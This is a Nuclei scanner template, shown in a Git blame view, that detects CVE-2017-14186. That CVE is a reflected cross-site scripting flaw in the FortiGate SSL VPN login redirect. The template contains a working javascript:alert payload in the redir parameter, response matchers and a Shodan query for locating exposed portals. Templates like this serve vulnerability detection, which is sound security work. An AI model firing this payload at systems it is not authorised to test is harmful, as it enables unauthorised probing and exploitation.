nuclei-templates/cves/2017/CVE-2017-14186.yml

39 lines
1.0 KiB
YAML
Raw Normal View History

2022-09-21 13:42:02 +00:00
id: CVE-2017-14186
info:
2022-09-21 18:18:54 +00:00
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
2022-09-21 13:42:02 +00:00
author: johnk3r
severity: medium
2022-09-21 18:18:54 +00:00
description: |
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
2022-09-21 13:42:02 +00:00
reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242
2022-09-21 18:18:54 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
2022-09-21 13:42:02 +00:00
classification:
cve-id: CVE-2017-14186
2022-09-21 18:18:54 +00:00
metadata:
verified: true
shodan-query: port:10443 http.favicon.hash:945408572
2022-09-21 13:42:02 +00:00
tags: cve,cve2017,fortigate,xss,fortinet
requests:
- method: GET
path:
2022-09-21 18:18:54 +00:00
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
2022-09-21 13:42:02 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-09-21 18:18:54 +00:00
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
2022-09-21 13:42:02 +00:00
- type: word
part: header
words:
2022-09-21 13:43:58 +00:00
- "text/html"
2022-09-21 18:18:54 +00:00
- type: status
status:
- 200